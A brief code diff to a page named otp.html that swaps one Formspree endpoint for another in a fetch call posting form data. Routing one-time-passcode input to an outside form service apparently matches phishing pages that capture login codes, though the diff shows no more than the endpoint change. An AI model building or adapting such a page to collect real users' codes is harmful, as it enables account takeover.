--- a/otp.html
+++ b/otp.html
@@ -70,7 +70,7 @@
             let formData = new FormData(form);
 
             try {
-              let response = await fetch("https://formspree.io/f/xoveqrzb", {
+              let response = await fetch("https://formspree.io/f/mdkeovkr", {
                 method: "POST",
                 body: formData,
                 headers: { Accept: "application/json" },
